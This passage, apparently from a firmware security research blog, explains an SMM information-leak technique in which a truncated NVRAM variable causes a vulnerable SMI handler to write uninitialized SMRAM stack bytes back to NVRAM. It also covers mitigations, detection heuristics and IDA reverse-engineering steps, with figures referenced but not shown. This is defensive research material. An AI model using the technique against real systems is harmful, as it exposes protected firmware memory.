Since the contents of some NVRAM variables (at least those that have the EFI_VARIABLE_RUNTIME_ACCESS attribute) can be modified from the operating system, they can be abused to trigger information disclosures in SMM while also serving simultaneously as the exfiltration channel. Let’s see how this can be done in practice.

First, the attacker would use an OS-provided API function such as SetFirmwareEnvironmentVariable() to truncate the variable, thus making it shorter than expected. Then, it will move on to trigger the vulnerable SMI handler. The SMI handler will:

  1. Allocate the stack-based buffer. Like any other stack-based allocation this buffer is uninitialized by default, meaning it holds leftovers from previous function calls that took place in SMM.
    Figure 33 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 1)
  2. Call the GetVariable() service to read the contents of the variable into the stack buffer. Normally, the size of the variable is equal to the size of the stack buffer, but since the attacker just truncated the variable in NVRAM, the buffer is surely longer. This in turn means it will continue to hold some uninitialized bytes even after GetVariable() returns.
    Figure 34 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 2)
  3. Modify the stack buffer in memory.
    Figure 35 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 3)
  4. Call the SetVariable() service to write back the modified stack buffer into NVRAM. Because this call is done using the hardcoded, constant size of the stack buffer, it will also write to NVRAM its uninitialized part.
    Figure 36 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 4)

To complete the process, the attacker can now use an API function such as GetFirmwareEnvironmentVariable() to fully disclose the contents of the variable, including the bytes that originate from the uninitialized portion.

Mitigation

The moral of this story is that NVRAM variables are not to be trusted blindly and should be taken into account when reasoning about the attack surface of the handler. If applicable, use compiler flags such as InitAll to make sure stack buffers will be zero-initialized. More tactically, when updating the contents of NVRAM variables the code must always take into account the actual size of the variable and not rely on a static, pre-computed value.

Yet another possible direction to mitigate these issues is to limit access to NVRAM variables. This can be done either by removing the EFI_VARIABLE_RUNTIME_ACCESS attribute entirely or using a protocol such as EDKII_VARIABLE_LOCK_PROTOCOL to make variables read-only.

Detection

It’s reasonable to assume that an NVRAM variable update operation will take place during the course of one function. That means we can usually ignore scenarios in which one function reads the variable and another one writes it. To locate these functions, after analyzing the input file with efiXplorer, navigate to the “services” tab and search for pairs of calls where SetVariable() is immediately followed by GetVariable():

Figure 37 – Searching for pairs of calls to GetVariable() and SetVariable()

For each such pair of calls, check that:

  1. Both calls originate from the same function
  2. Both calls operate on the same NVRAM variable
  3. The size argument passed to SetVariable() is an immediate value
Figure 38 – Simple heuristics to detect SMRAM info leaks

Identifying Library Functions

This post freely references library functions such as FreePool() and SmmIsBufferOutsideSmmValid() and naively assumes we can locate them without any hassle. The problem is these functions are statically linked to the binary, and normally SMM images are stripped of any debug symbols before being shipped to end-users. Due to that, locating them inside the IDA database is quite challenging.

During our work, we researched multiple approaches to tackle this problem, including automated diffing using Diaphora as well as experimentation with some lesser-known plugins such as rizzo and fingermatch. Eventually, we decided to stick to the KISS principle and perform the matching using plain and simple heuristics that take into consideration some of the unique characteristics of the target function. Below are some rules-of-thumb for matching the functions referenced earlier. Note that we assume the binary was already analyzed by efiXplorer, which makes things a bit easier.

FreePool

Identifying FreePool() is pretty straightforward. All it takes is to scan the IDA database for a function that:

  • Receives one integer argument.
  • Conditionally, calls one of gBs->FreePool() or gSmst->FreePool() (but never both)
  • Forwards its input argument to both of these services
  • Figure 39 – Simple heuristic to pinpoint FreePool()

SmmIsBufferOutsideSmmValid

Identification of SmmIsBufferOutsideSmmValid() is a bit trickier. To successfully pull this off, we need to have some background information about a UEFI protocol called EFI_SMM_ACCESS2_PROTOCOL. This protocol is used to manage and query the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 40 – Interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exports a method called GetCapabilities(), which can be used by clients to figure out exactly where SMRAM lives in physical memory.

Figure 41 – Documentation of the GetCapabilities() function, source: Step to UEFI

Upon return, this function fills an array of EFI_SMRAM_DESCRIPTOR structures that tell the caller what regions of SMRAM are available, what is their size, state, etc.

Figure 42 – Output of a sample program that uses EFI_SMM_ACCESS2_PROTOCOL to query SMRAM ranges, source: Step to UEFI

In EDK2, the common practice is to store these EFI_SMRAM_DESCRIPTORS as global variables so that other functions could easily access them in the future. As you probably guessed, one of these functions is no other than SmmIsBufferOutsideSmmValid(), which iterates over the descriptors list to decide if the caller-provided buffer is safe:

Figure 43 – Source code for SmmIsBufferOutsideSmmValid, source: SmmMemLib.c

Taking this into consideration, our strategy to identify SmmIsBufferOutsideSmmValid() would be that of reverse lookup – first, we’ll find the global SMRAM descriptors initialized by EFI_SMM_ACCESS2_PROTOCOL and only then, based on the functions that use them, deduce who’s the most promising candidate to be SmmIsBufferOutsideSmmValid().

Technically, one can do so by following these simple steps:

  • Go to the “protocols” tab in efiXplorer and double click EFI_SMM_ACCESS2_PROTOCOL. This will cause IDA to jump to the location where this GUID is utilized (usually the call to LocateProtocol)
    Figure 44 – Searching for EFI_SMM_ACCESS2_PROTOCOL in IDA
  • Click on the protocol’s interface pointer (EfiSmmAccess2Protocol) and hit ‘x’ to search for its xrefs:
    Figure 45 – Listing the cross-references to EfiSmmAccess2Protocol
  • For each call to GetCapabilities(), check if the 3rd parameter (the SMRAM descriptor) is a global variable. If it is, do the following:
    • Hit ‘n’ to rename it according to some naming convention (say, SmramDescriptor_XXX, where XXX is an ordinal) to allow for easy reference in the future
    • Hit ‘y’ and set its variable type to EFI_SMRAM_DESCRIPTOR *

    Figure 46 – Renaming and setting the type for the SMRAM descriptors

  • Now check the following criteria for each function in the database.
    1. The function must receive two integer arguments
    2. The function must return a boolean value. From the perspective of the decompiler, boolean values are just plain integers, so to make this distinction we should go over all the return statements in the function and check that the returned value is a member of the set {0,1}.
    3. The function must reference one of the SMRAM descriptors that were marked in the previous step

If all three conditions are met, chances are the function you’re looking at is actually SmmIsBufferOutsideSmmValid():

Figure 47 – Locating SmmIsBufferOutsideSmmValid() in compiled SMM binaries using simple heuristics

AMI_SMM_BUFFER_VALIDATION_PROTOCOL

Currently, efiXplorer does not support the definition of AMI_SMM_BUFFER_VALIDATION_PROTOCOL out of the box, so we must import the protocol definition separately.

Figure 48 – AMI_SMM_BUFFER_VALIDATION is not supported out of the box

To accomplish this, follow these steps:

  1. Download the protocol header file from GitHub and save it locally.
  2. Open an IDAPython prompt and run the following snippet:
    Figure 49 – Defining some C macros to enable importing the protocol header

    This is necessary because the header file makes use of several macros and typedefs that must be #defined manually before importing it.
  3. Navigate to the File->Import C header file menu to import the header.
    Figure 50 – Importing the header file
  4. Run again efiXplorer (hotkey: CTRL+ALT+E) and notice how the decompilation output suddenly changes:
    Figure 51 – AMI_SMM_BUFFER_VALIDATION is now recognized

Conclusion

“The more you look, the more you see.”
– Robert M. Pirsig,  Zen and the Art of Motorcycle Maintenance

Firmware-level attacks seem to pose a significant challenge to the security community. As part of the everlasting cat-and-mouse game between attackers and defenders, threat actors are starting to shift their spotlight to the firmware, considered by many the soft belly of the IT stack. In recent years, awareness of firmware threats is constantly increasing and some promising approaches are emerging to combat them:

  • Hardware vendors such as Intel, are constantly adding more security features to each new line of CPUs. The important advantage of these features is that they’re baked into the hardware and are capable of eliminating certain bug classes from the ground up (or at least make exploitation much harder). The downside with this approach is that due to the fragmented nature of the industry, not every feature that is supported by the hardware gets widespread adoption from the software side. While certain features such as Secure Boot, Boot Guard, and BIOS Guard are highly popular and can be found in the majority of commodity machines, other features such as STM (SMI Transfer Monitor, a technology which was intended to de-privilege SMM) were left as merely a PoC.
  • OS vendors such as Microsoft are collaborating intensely with leading OEMs to help bridge the gap between firmware security and OS security, a mandatory move given their long-term vision of harnessing virtualization to protect every Windows machine. The outcome of these endeavors is the line of Secured-Core PCs, which come preloaded with security features and configurations that are aimed at narrowing down the firmware attack surface as well as constricting the damage in case of an attack.
  • EDR vendors also contribute their part and are starting to tap into the firmware and provide visibility into the SPI flash memory and the EFI system partition. This approach is great for spotting IOCs of known firmware implants, but unfortunately is rather restricted when it comes to detecting the underlying vulnerabilities that enabled the infection in the first place.

Even in the face of these advancements, firmware security still bears lots and lots of issues, design flaws, and of course vulnerabilities to uncover. The ability of the security community to successfully pull this off depends on three fundamental pillars: knowledge, tooling, and diligence.

In this blog post, we were focused on promoting knowledge by shedding light on unfamiliar territory. In the next post, we’ll cover tooling and reveal:

  • How we automated the bug hunting process to the degree that finding SMM vulnerabilities is merely a matter of running a Python script
  • Some real-life examples of vulnerabilities we found, affecting most well-known OEMs in the industry.

As for diligence, unfortunately, no known recipe exists for producing such human qualities. It is, therefore, the responsibility of each and every one of us to just try our best and make sure that no stone is left unturned in this exciting and challenging domain.

Further Reading

❌